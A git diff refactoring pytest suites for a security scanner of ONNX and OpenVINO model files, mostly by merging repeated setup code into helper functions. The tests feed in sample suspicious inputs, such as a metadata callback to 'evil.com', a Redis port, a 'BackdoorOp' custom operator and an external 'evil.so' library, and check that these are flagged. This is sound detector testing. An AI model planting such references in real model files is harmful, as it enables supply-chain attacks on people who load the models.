enumerate(output_names) ] graph = helper.make_graph(nodes, "many_consumer_graph", [X], [Y], initializer=[initializer]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "many-consumer-weights.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "many-consumer-weights.onnx") def create_invalid_initializer_name_model(tmp_path: Path, *, duplicate: bool) -> Path: @@ -1080,9 +1014,9 @@ def create_invalid_initializer_name_model(tmp_path: Path, *, duplicate: bool) -> graph = helper.make_graph([node], "invalid_initializer_names", [X], [Y], initializer=initializers) model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) model.ir_version = 8 - path = tmp_path / ("duplicate-initializers.onnx" if duplicate else "empty-initializer.onnx") - onnx.save(model, str(path)) - return path + return _save_onnx_model( + model, tmp_path / ("duplicate-initializers.onnx" if duplicate else "empty-initializer.onnx") + ) def create_left_equivalent_linear_model( @@ -1103,12 +1037,8 @@ def create_left_equivalent_linear_model( helper.make_node("Transpose", ["output_t"], ["output"], name="transpose_output", perm=[1, 0]), ] graph = helper.make_graph(nodes, "left_equivalent_graph", [X], [Y], initializer=[weight_tensor]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / f"left-equivalent-{op_type.lower()}.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / f"left-equivalent-{op_type.lower()}.onnx") def create_onnx_conv_weight_model( @@ -1129,12 +1059,8 @@ def create_onnx_conv_weight_model( Y = helper.make_tensor_value_info("output", TensorProto.FLOAT, [1, output_channels, spatial_size, spatial_size]) node = helper.make_node(op_type, ["input", "W"], ["output"], name="convolution", group=group) graph = helper.make_graph([node], "conv_weight_graph", [X], [Y], initializer=[weight_tensor]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / filename - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / filename) def create_control_flow_captured_weight_model( @@ -1222,12 +1148,8 @@ def make_branch(name: str) -> Any: raise AssertionError(f"Unsupported control-flow operator: {control_flow_op}") graph = helper.make_graph([control_node], "control_graph", graph_inputs, graph_outputs, initializer=[weight_tensor]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / f"captured-{control_flow_op.lower()}.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / f"captured-{control_flow_op.lower()}.onnx") def create_control_flow_shadowed_weight_model( @@ -1264,12 +1186,8 @@ def make_branch(name: str) -> Any: [Y], initializer=[outer_weight_tensor], ) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "shadowed-captured-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "shadowed-captured-weight.onnx") def create_control_flow_returned_weight_model(tmp_path: Path, weights: np.ndarray) -> Path: @@ -1301,12 +1219,8 @@ def make_branch(name: str) -> Any: helper.make_node("MatMul", ["X", "selected_weight"], ["Y"], name="linear"), ] graph = helper.make_graph(nodes, "returned_weight_graph", [condition, X], [Y], initializer=[initializer]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "returned-control-flow-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "returned-control-flow-weight.onnx") def create_loop_carried_weight_model(tmp_path: Path, weights: np.ndarray) -> Path: @@ -1348,12 +1262,8 @@ def create_loop_carried_weight_model(tmp_path: Path, weights: np.ndarray) -> Pat [Y], initializer=[initializer], ) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "loop-carried-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "loop-carried-weight.onnx") def create_activation_bookkeeping_model(tmp_path: Path, *, malicious: bool, rank_two_bias: bool = False) -> Path: @@ -1379,14 +1289,12 @@ def create_activation_bookkeeping_model(tmp_path: Path, *, malicious: bool, rank helper.make_node("MatMul", ["activated", "W2"], ["Y"], name="second_linear"), ] graph = helper.make_graph(nodes, "activation_bookkeeping_graph", [X], [Y], initializer=initializers) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / ( - f"{'malicious' if malicious else 'benign'}-activation-bookkeeping-{'2d' if rank_two_bias else '1d'}.onnx" + model = _checked_onnx_model(graph) + return _save_onnx_model( + model, + tmp_path + / (f"{'malicious' if malicious else 'benign'}-activation-bookkeeping-{'2d' if rank_two_bias else '1d'}.onnx"), ) - onnx.save(model, str(path)) - return path def create_shape_gather_bookkeeping_model(tmp_path: Path, *, malicious: bool) -> Path: @@ -1410,12 +1318,8 @@ def create_shape_gather_bookkeeping_model(tmp_path: Path, *, malicious: bool) -> helper.make_node("MatMul", ["reshaped", "W2"], ["Y"], name="second_linear"), ] graph = helper.make_graph(nodes, "shape_gather_bookkeeping_graph", [X], [Y], initializer=initializers) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / f"{'malicious' if malicious else 'benign'}-shape-gather-bookkeeping.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / f"{'malicious' if malicious else 'benign'}-shape-gather-bookkeeping.onnx") def create_einsum_weight_model(tmp_path: Path, weights: np.ndarray) -> Path: @@ -1424,12 +1328,8 @@ def create_einsum_weight_model(tmp_path: Path, weights: np.ndarray) -> Path: Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, weights.shape[1]]) node = helper.make_node("Einsum", ["X", "W"], ["Y"], name="linear", equation="bi,io->bo") graph = helper.make_graph([node], "einsum_weight_graph", [X], [Y], initializer=[initializer]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "einsum-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "einsum-weight.onnx") def create_qdq_weight_model(tmp_path: Path) -> Path: @@ -1443,12 +1343,8 @@ def create_qdq_weight_model(tmp_path: Path) -> Path: helper.make_node("MatMul", ["X", "dequantized_weight"], ["Y"]), ] graph = helper.make_graph(nodes, "qdq_weight_graph", [X], [Y], initializer=[quantized_weight, scale, zero_point]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "qdq-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "qdq-weight.onnx") def create_sparse_weight_model(tmp_path: Path) -> Path: @@ -1464,12 +1360,8 @@ def create_sparse_weight_model(tmp_path: Path) -> Path: Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 10]) node = helper.make_node("MatMul", ["X", "W"], ["Y"], name="linear") graph = helper.make_graph([node], "sparse_weight_graph", [X], [Y], sparse_initializer=[sparse_weight]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "sparse-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "sparse-weight.onnx") def create_constant_weight_model(tmp_path: Path, weights: np.ndarray) -> Path: @@ -1481,12 +1373,8 @@ def create_constant_weight_model(tmp_path: Path, weights: np.ndarray) -> Path: helper.make_node("MatMul", ["X", "W"], ["Y"], name="linear"), ] graph = helper.make_graph(nodes, "constant_weight_graph", [X], [Y]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "constant-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "constant-weight.onnx") def create_local_function_weight_model(tmp_path: Path, weights: np.ndarray) -> Path: @@ -1511,9 +1399,7 @@ def create_local_function_weight_model(tmp_path: Path, weights: np.ndarray) -> P ) model.ir_version = 8 onnx.checker.check_model(model) - path = tmp_path / "local-function-weight.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "local-function-weight.onnx") def create_local_function_default_weight_model(tmp_path: Path, weights: np.ndarray) -> Path: @@ -1552,9 +1438,7 @@ def create_local_function_default_weight_model(tmp_path: Path, weights: np.ndarr ) model.ir_version = 9 onnx.checker.check_model(model) - path = tmp_path / "local-function-default-weight.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "local-function-default-weight.onnx") def create_repeated_local_function_default_weight_model(tmp_path: Path, weights: np.ndarray) -> Path: @@ -1597,9 +1481,7 @@ def create_repeated_local_function_default_weight_model(tmp_path: Path, weights: ) model.ir_version = 9 onnx.checker.check_model(model) - path = tmp_path / "repeated-local-function-default-weight.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "repeated-local-function-default-weight.onnx") def create_many_local_function_weight_overrides_model(tmp_path: Path, *, call_count: int = 100) -> Path: @@ -1661,9 +1543,7 @@ def create_many_local_function_weight_overrides_model(tmp_path: Path, *, call_co ) model.ir_version = 9 onnx.checker.check_model(model) - path = tmp_path / "many-local-function-weight-overrides.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "many-local-function-weight-overrides.onnx") def create_many_if_branch_weight_model(tmp_path: Path, *, branch_count: int = 20) -> Path: @@ -1702,12 +1582,8 @@ def branch_graph(name: str, weights: np.ndarray) -> Any: ) graph = helper.make_graph(nodes, "many_if_branch_weights", [condition, X], [Y]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "many-if-branch-weights.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "many-if-branch-weights.onnx") def create_static_shape_transform_weight_model( @@ -1754,12 +1630,8 @@ def create_static_shape_transform_weight_model( Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, output_shape) nodes.append(helper.make_node("MatMul", ["X", "W_view"], ["Y"], name="linear")) graph = helper.make_graph(nodes, "static_shape_transform_graph", [X], [Y], initializer=initializers) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / f"{transform.lower()}-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / f"{transform.lower()}-weight.onnx") def create_python_onnx_model(tmp_path: Path) -> Path: @@ -1768,9 +1640,7 @@ def create_python_onnx_model(tmp_path: Path) -> Path: node = helper.make_node("PythonOp", ["input"], ["output"], name="python") graph = helper.make_graph([node], "graph", [X], [Y]) model = helper.make_model(graph) - path = tmp_path / "model.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "model.onnx") def create_onnx_model_with_nested_external_initializer( @@ -2037,9 +1907,7 @@ def create_onnx_model_with_function_overload( opset_imports=[helper.make_opsetid("", 13), helper.make_opsetid("local", 1)], ) model.ir_version = 10 - path = tmp_path / f"function_overload_{function_overload}_{call_overload}.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / f"function_overload_{function_overload}_{call_overload}.onnx") def create_onnx_model_with_function_preview_operator( @@ -2072,9 +1940,7 @@ def create_onnx_model_with_function_preview_operator( opset_imports=[helper.make_opsetid("", 13), helper.make_opsetid("local", 1)], ) model.ir_version = 10 - path = tmp_path / "function_preview_operator.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "function_preview_operator.onnx") def create_onnx_model_with_function_body_external_initializer( @@ -2205,9 +2071,7 @@ def create_onnx_model_with_custom_nodes( graph = helper.make_graph(nodes, "custom_nodes", [input_value], [output_value]) model = helper.make_model(graph, opset_imports=opset_imports) model.ir_version = 8 - model_path = tmp_path / filename - onnx.save(model, str(model_path)) - return model_path + return _save_onnx_model(model, tmp_path / filename) def create_onnx_model_with_explicit_custom_operator_identities( @@ -2235,9 +2099,7 @@ def create_onnx_model_with_explicit_custom_operator_identities( graph = helper.make_graph(nodes, "explicit_custom_operator_identities", [input_value], [output_value]) model = helper.make_model(graph, opset_imports=opset_imports) model.ir_version = 8 - model_path = tmp_path / filename - onnx.save(model, str(model_path)) - return model_path + return _save_onnx_model(model, tmp_path / filename) def create_onnx_model_with_repeated_custom_domain_and_missing_external_data(tmp_path: Path) -> Path: @@ -2254,9 +2116,7 @@ def create_onnx_model_with_repeated_custom_domain_and_missing_external_data(tmp_ opset_imports=[helper.make_opsetid("", 13), helper.make_opsetid("com.external", 1)], ) model.ir_version = 8 - model_path = tmp_path / "custom_external_data.onnx" - onnx.save(model, str(model_path)) - return model_path + return _save_onnx_model(model, tmp_path / "custom_external_data.onnx") def create_onnx_model_with_mixed_custom_domains(tmp_path: Path) -> Path: @@ -2275,9 +2135,7 @@ def create_onnx_model_with_mixed_custom_domains(tmp_path: Path) -> Path: helper.make_opsetid("com.acme.ops", 1), ], ) - path = tmp_path / "mixed_custom_domains.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "mixed_custom_domains.onnx") def create_onnx_model_with_function_microsoft_operator(tmp_path: Path, *, op_type: str) -> Path: @@ -2301,9 +2159,7 @@ def create_onnx_model_with_function_microsoft_operator(tmp_path: Path, *, op_typ opset_imports=[helper.make_opsetid("", 13), helper.make_opsetid("local", 1)], ) model.ir_version = 10 - path = tmp_path / f"function_microsoft_{op_type}.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / f"function_microsoft_{op_type}.onnx") def test_onnx_scanner_can_handle(tmp_path): @@ -4172,29 +4028,11 @@ def test_onnx_scanner_custom_operator_emits_one_domain_rule(tmp_path: Path) -> N def test_onnx_scanner_ai_onnx_ml_subdomain_still_flagged(tmp_path: Path) -> None: - model_path = create_onnx_model( - tmp_path, - custom=True, - custom_domain="ai.onnx.ml.malicious", - custom_op_type="BackdoorOp", - ) - _result, custom_domain_checks, metadata_custom_domains = _scan_and_extract_custom_domains(model_path) - assert len(custom_domain_checks) > 0, "Expected non-standard ai.onnx.ml subdomain to be flagged" - assert any(c.details.get("domain") == "ai.onnx.ml.malicious" for c in custom_domain_checks) - assert "ai.onnx.ml.malicious" in metadata_custom_domains + _assert_onnx_domain(tmp_path, "ai.onnx.ml.malicious", "Expected non-standard ai.onnx.ml subdomain to be flagged") def test_onnx_scanner_ai_onnx_training_domain_still_flagged(tmp_path: Path) -> None: - model_path = create_onnx_model( - tmp_path, - custom=True, - custom_domain="ai.onnx.training", - custom_op_type="BackdoorOp", - ) - _result, custom_domain_checks, metadata_custom_domains = _scan_and_extract_custom_domains(model_path) - assert len(custom_domain_checks) > 0, "Expected non-standard ai.onnx.training domain to be flagged" - assert any(c.details.get("domain") == "ai.onnx.training" for c in custom_domain_checks) - assert "ai.onnx.training" in metadata_custom_domains + _assert_onnx_domain(tmp_path, "ai.onnx.training", "Expected non-standard ai.onnx.training domain to be flagged") def test_onnx_scanner_external_data_missing(tmp_path: Path) -> None: @@ -4320,19 +4158,7 @@ def test_onnx_scanner_uppercase_snake_python_op_wrapper_flagged(tmp_path: Path, def test_onnx_scanner_python_substring_near_match_not_flagged(tmp_path: Path) -> None: - model_path = create_onnx_model( - tmp_path, - custom=True, - custom_domain="", - custom_op_type="MyPythonOptimizer", - ) - - result = OnnxScanner().scan(str(model_path)) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert ONNX_SCHEMA_INCONCLUSIVE_REASON in result.metadata["scan_outcome_reasons"] - assert not [c for c in result.checks if c.name == "Python Operator Detection" and c.status == CheckStatus.FAILED] + _assert_onnx_python_near_match_clean(tmp_path, ("MyPythonOptimizer")) def test_onnx_scanner_python_doc_string_metadata_not_flagged_as_python_operator(tmp_path: Path) -> None: @@ -4353,19 +4179,7 @@ def test_onnx_scanner_python_doc_string_metadata_not_flagged_as_python_operator( def test_onnx_scanner_uppercase_snake_python_near_match_not_flagged(tmp_path: Path) -> None: - model_path = create_onnx_model( - tmp_path, - custom=True, - custom_domain="", - custom_op_type="MY_PYTHON_OPTIMIZER", - ) - - result = OnnxScanner().scan(str(model_path)) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert ONNX_SCHEMA_INCONCLUSIVE_REASON in result.metadata["scan_outcome_reasons"] - assert not [c for c in result.checks if c.name == "Python Operator Detection" and c.status == CheckStatus.FAILED] + _assert_onnx_python_near_match_clean(tmp_path, ("MY_PYTHON_OPTIMIZER")) def _save_model_with_int8_weight(tmp_path: Path, weight_bytes: bytes, *, extra_node: Any = None) -> Path: @@ -5648,40 +5462,10 @@ def test_unknown_external_data_dtype_preserves_security_exit1(self, tmp_path: Pa assert determine_exit_code(aggregate) == 1 def test_invalid_offset_metadata_fails_size_validation(self, tmp_path: Path) -> None: - model_path = create_onnx_model( - tmp_path, - external=True, - external_path="weights.bin", - external_metadata={"offset": "NaN"}, - ) - - result = OnnxScanner().scan(str(model_path)) - - assert result.success is False - size_checks = [ - c for c in result.checks if c.name == "External Data Size Validation" and c.status == CheckStatus.FAILED - ] - assert len(size_checks) > 0 - assert size_checks[0].severity == IssueSeverity.CRITICAL - assert "invalid" in size_checks[0].message.lower() + _assert_onnx_invalid_external_offset(tmp_path, ("NaN"), ("invalid")) def test_negative_offset_metadata_fails_size_validation(self, tmp_path: Path) -> None: - model_path = create_onnx_model( - tmp_path, - external=True, - external_path="weights.bin", - external_metadata={"offset": "-1"}, - ) - - result = OnnxScanner().scan(str(model_path)) - - assert result.success is False - size_checks = [ - c for c in result.checks if c.name == "External Data Size Validation" and c.status == CheckStatus.FAILED - ] - assert len(size_checks) > 0 - assert size_checks[0].severity == IssueSeverity.CRITICAL - assert "non-negative" in size_checks[0].message.lower() + _assert_onnx_invalid_external_offset(tmp_path, ("-1"), ("non-negative")) class TestWeightDistributionCoverage: @@ -8057,15 +7841,7 @@ def test_standalone_onnx_scanner_matches_gather_orientation(self, tmp_path: Path def _encode_proto_varint(value: int) -> bytes: if value < 0: raise ValueError("test protobuf helper only encodes non-negative integers") - encoded = bytearray() - while True: - byte = value & 0x7F - value >>= 7 - if value: - encoded.append(byte | 0x80) - else: - encoded.append(byte) - return bytes(encoded) + return _encode_protobuf_varint(value) def _proto_key(field_number: int, wire_type: int) -> bytes: @@ -8080,12 +7856,6 @@ def _proto_bytes(field_number: int, payload: bytes) -> bytes: return _proto_key(field_number, 2) + _encode_proto_varint(len(payload)) + payload -def _write_onnx_payload(tmp_path: Path, filename: str, payload: bytes) -> Path: - path = tmp_path / filename - path.write_bytes(payload) - return path - - def _sha256_file(path: Path) -> str: digest = hashlib.sha256() with path.open("rb") as handle: @@ -10154,20 +9924,7 @@ def test_network_detector_preserves_nested_onnx_metadata_props(self, tmp_path: P ) def test_network_detector_metadata_contact_domain_stays_clean(self, tmp_path: Path) -> None: - model_path = create_onnx_model(tmp_path, include_initializer=False) - model = onnx.load(str(model_path)) - metadata = model.metadata_props.add() - metadata.key = "contact" - metadata.value = "owner@company.com" - onnx.save(model, str(model_path)) - - result = OnnxScanner(config={"check_jit_script": False}).scan(str(model_path)) - - failed_network_checks = [ - check for check in self._network_detection_checks(result) if check.status == CheckStatus.FAILED - ] - assert not failed_network_checks - assert any(check.status == CheckStatus.PASSED for check in self._network_detection_checks(result)) + self._assert_onnx_metadata_network_clean(tmp_path, ("contact"), ("owner@company.com")) def test_network_detector_extensionless_metadata_contact_domain_stays_clean(self, tmp_path: Path) -> None: source_path = create_onnx_model(tmp_path, include_initializer=False) @@ -10187,22 +9944,8 @@ def test_network_detector_extensionless_metadata_contact_domain_stays_clean(self assert any(check.status == CheckStatus.PASSED for check in self._network_detection_checks(result)) def test_network_detector_extensionless_metadata_callback_domain_remains_actionable(self, tmp_path: Path) -> None: - source_path = create_onnx_model(tmp_path, include_initializer=False) - model = onnx.load(str(source_path)) - metadata = model.metadata_props.add() - metadata.key = "callback" - metadata.value = "host evil.com" - model_path = tmp_path / "metadata-callback" - onnx.save(model, str(model_path)) - - result = OnnxScanner(config={"check_jit_script": False}).scan(str(model_path)) - - failed_network_checks = [ - check for check in self._network_detection_checks(result) if check.status == CheckStatus.FAILED - ] - assert any( - check.details.get("domain") == "evil.com" and check.details.get("onnx_metadata_owned") is True - for check in failed_network_checks + self._assert_onnx_metadata_network_actionable( + tmp_path, ("host evil.com"), ("metadata-callback"), ("domain"), ("evil.com") ) def test_network_detector_extensionless_metadata_callback_domain_uses_full_value(self, tmp_path: Path) -> None: @@ -10225,20 +9968,9 @@ def test_network_detector_extensionless_metadata_callback_domain_uses_full_value ) def test_network_detector_metadata_prose_import_requests_stays_clean(self, tmp_path: Path) -> None: - model_path = create_onnx_model(tmp_path, include_initializer=False) - model = onnx.load(str(model_path)) - metadata = model.metadata_props.add() - metadata.key = "documentation" - metadata.value = "This documentation shows how to import requests for the example" - onnx.save(model, str(model_path)) - - result = OnnxScanner(config={"check_jit_script": False}).scan(str(model_path)) - - failed_network_checks = [ - check for check in self._network_detection_checks(result) if check.status == CheckStatus.FAILED - ] - assert not failed_network_checks - assert any(check.status == CheckStatus.PASSED for check in self._network_detection_checks(result)) + self._assert_onnx_metadata_network_clean( + tmp_path, ("documentation"), ("This documentation shows how to import requests for the example") + ) def test_network_detector_metadata_documentation_port_stays_clean(self, tmp_path: Path) -> None: model_path = create_onnx_model(tmp_path, include_initializer=False) @@ -10274,41 +10006,13 @@ def test_network_detector_extensionless_metadata_documentation_port_stays_clean( assert any(check.status == CheckStatus.PASSED for check in self._network_detection_checks(result)) def test_network_detector_extensionless_metadata_callback_port_remains_actionable(self, tmp_path: Path) -> None: - source_path = create_onnx_model(tmp_path, include_initializer=False) - model = onnx.load(str(source_path)) - metadata = model.metadata_props.add() - metadata.key = "callback" - metadata.value = "connect port=6379" - model_path = tmp_path / "metadata-callback-port" - onnx.save(model, str(model_path)) - - result = OnnxScanner(config={"check_jit_script": False}).scan(str(model_path)) - - failed_network_checks = [ - check for check in self._network_detection_checks(result) if check.status == CheckStatus.FAILED - ] - assert any( - check.details.get("type") == "suspicious_port" and check.details.get("onnx_metadata_owned") is True - for check in failed_network_checks + self._assert_onnx_metadata_network_actionable( + tmp_path, ("connect port=6379"), ("metadata-callback-port"), ("type"), ("suspicious_port") ) def test_network_detector_pb_metadata_port_remains_actionable(self, tmp_path: Path) -> None: - source_path = create_onnx_model(tmp_path, include_initializer=False) - model = onnx.load(str(source_path)) - metadata = model.metadata_props.add() - metadata.key = "callback" - metadata.value = "connect port=6379" - model_path = tmp_path / "model.pb" - onnx.save(model, str(model_path)) - - result = OnnxScanner(config={"check_jit_script": False}).scan(str(model_path)) - - failed_network_checks = [ - check for check in self._network_detection_checks(result) if check.status == CheckStatus.FAILED - ] - assert any( - check.details.get("type") == "suspicious_port" and check.details.get("onnx_metadata_owned") is True - for check in failed_network_checks + self._assert_onnx_metadata_network_actionable( + tmp_path, ("connect port=6379"), ("model.pb"), ("type"), ("suspicious_port") ) def test_network_detector_nonmetadata_url_remains_actionable(self, tmp_path: Path) -> None: @@ -10593,3 +10297,88 @@ def _raise_analysis_failure(self: NetworkCommDetector, *_args: Any, **_kwargs: A assert leaked_secret not in str(coverage_check.details) assert leaked_secret not in caplog.text assert "" in coverage_check.message + + def _assert_onnx_metadata_network_actionable( + self, tmp_path: Path, metadata_value: str, filename: str, evidence_field: str, evidence_value: str + ) -> None: + source_path = create_onnx_model(tmp_path, include_initializer=False) + model = onnx.load(str(source_path)) + metadata = model.metadata_props.add() + metadata.key = "callback" + metadata.value = metadata_value + model_path = tmp_path / filename + onnx.save(model, str(model_path)) + + result = OnnxScanner(config={"check_jit_script": False}).scan(str(model_path)) + + failed_network_checks = [ + check for check in self._network_detection_checks(result) if check.status == CheckStatus.FAILED + ] + assert any( + check.details.get(evidence_field) == evidence_value and check.details.get("onnx_metadata_owned") is True + for check in failed_network_checks + ) + + def _assert_onnx_metadata_network_clean(self, tmp_path: Path, metadata_key: str, metadata_value: str) -> None: + model_path = create_onnx_model(tmp_path, include_initializer=False) + model = onnx.load(str(model_path)) + metadata = model.metadata_props.add() + metadata.key = metadata_key + metadata.value = metadata_value + onnx.save(model, str(model_path)) + + result = OnnxScanner(config={"check_jit_script": False}).scan(str(model_path)) + + failed_network_checks = [ + check for check in self._network_detection_checks(result) if check.status == CheckStatus.FAILED + ] + assert not failed_network_checks + assert any(check.status == CheckStatus.PASSED for check in self._network_detection_checks(result)) + + +def _assert_onnx_invalid_external_offset(tmp_path: Path, offset: str, message: str) -> None: + model_path = create_onnx_model( + tmp_path, + external=True, + external_path="weights.bin", + external_metadata={"offset": offset}, + ) + + result = OnnxScanner().scan(str(model_path)) + + assert result.success is False + size_checks = [ + c for c in result.checks if c.name == "External Data Size Validation" and c.status == CheckStatus.FAILED + ] + assert len(size_checks) > 0 + assert size_checks[0].severity == IssueSeverity.CRITICAL + assert message in size_checks[0].message.lower() + + +def _assert_onnx_python_near_match_clean(tmp_path: Path, operator: str) -> None: + model_path = create_onnx_model( + tmp_path, + custom=True, + custom_domain="", + custom_op_type=operator, + ) + + result = OnnxScanner().scan(str(model_path)) + + assert result.success is False + assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME + assert ONNX_SCHEMA_INCONCLUSIVE_REASON in result.metadata["scan_outcome_reasons"] + assert not [c for c in result.checks if c.name == "Python Operator Detection" and c.status == CheckStatus.FAILED] + + +def _assert_onnx_domain(tmp_path: Path, domain: str, message: str) -> None: + model_path = create_onnx_model( + tmp_path, + custom=True, + custom_domain=domain, + custom_op_type="BackdoorOp", + ) + _result, custom_domain_checks, metadata_custom_domains = _scan_and_extract_custom_domains(model_path) + assert len(custom_domain_checks) > 0, message + assert any(c.details.get("domain") == domain for c in custom_domain_checks) + assert domain in metadata_custom_domains diff --git a/tests/scanners/test_openvino_scanner.py b/tests/scanners/test_openvino_scanner.py index 7e5f81a43..f74e3b48c 100644 --- a/tests/scanners/test_openvino_scanner.py +++ b/tests/scanners/test_openvino_scanner.py @@ -381,12 +381,7 @@ def test_openvino_scanner_detects_layer_in_namespace_distinct_from_root(tmp_path """, encoding="utf-8", ) - (tmp_path / "mixed-namespaces.bin").write_bytes(b"\x00") - - result = OpenVinoScanner().scan(str(xml_path)) - - assert any(check.name == "Suspicious Layer Type Detection" for check in result.checks) - assert any(check.name == "External Library Reference Check" for check in result.checks) + _assert_namespaced_layer(tmp_path, xml_path, "mixed-namespaces.bin") def test_openvino_scanner_detects_mixed_case_namespaced_layer(tmp_path: Path) -> None: @@ -401,12 +396,7 @@ def test_openvino_scanner_detects_mixed_case_namespaced_layer(tmp_path: Path) -> """, encoding="utf-8", ) - (tmp_path / "mixed-case-layer.bin").write_bytes(b"\x00") - - result = OpenVinoScanner().scan(str(xml_path)) - - assert any(check.name == "Suspicious Layer Type Detection" for check in result.checks) - assert any(check.name == "External Library Reference Check" for check in result.checks) + _assert_namespaced_layer(tmp_path, xml_path, "mixed-case-layer.bin") def test_openvino_scanner_respects_configured_file_size_limit(tmp_path: Path) -> None: @@ -481,12 +471,7 @@ def test_openvino_scanner_detects_nested_external_library_references(tmp_path: P """, encoding="utf-8", ) - (tmp_path / "model.bin").write_bytes(b"\x00") - - result = OpenVinoScanner().scan(str(xml_path)) - - assert result.success is False - assert any("external library 'evil.so'" in issue.message for issue in result.issues) + _assert_external_library(tmp_path, xml_path, "external library 'evil.so'") def test_openvino_scanner_symbolic_implementation_metadata_is_not_external_library(tmp_path: Path) -> None: @@ -504,12 +489,7 @@ def test_openvino_scanner_symbolic_implementation_metadata_is_not_external_libra """, encoding="utf-8", ) - (tmp_path / "model.bin").write_bytes(b"\x00") - - result = OpenVinoScanner().scan(str(xml_path)) - - assert result.success is True - assert not any(check.name == "External Library Reference Check" for check in result.checks) + _assert_openvino_metadata_control(tmp_path, xml_path, "External Library Reference Check") def test_openvino_scanner_detects_versioned_native_library_reference(tmp_path: Path) -> None: @@ -527,12 +507,7 @@ def test_openvino_scanner_detects_versioned_native_library_reference(tmp_path: P """, encoding="utf-8", ) - (tmp_path / "model.bin").write_bytes(b"\x00") - - result = OpenVinoScanner().scan(str(xml_path)) - - assert result.success is False - assert any("external library 'libcustom_op.so.1'" in issue.message for issue in result.issues) + _assert_external_library(tmp_path, xml_path, "external library 'libcustom_op.so.1'") def test_openvino_scanner_detects_path_external_library_reference(tmp_path: Path) -> None: @@ -550,12 +525,7 @@ def test_openvino_scanner_detects_path_external_library_reference(tmp_path: Path """, encoding="utf-8", ) - (tmp_path / "model.bin").write_bytes(b"\x00") - - result = OpenVinoScanner().scan(str(xml_path)) - - assert result.success is False - assert any("external library '../plugins/custom_op'" in issue.message for issue in result.issues) + _assert_external_library(tmp_path, xml_path, "external library '../plugins/custom_op'") def test_openvino_scanner_redacts_external_library_url_secrets(tmp_path: Path) -> None: @@ 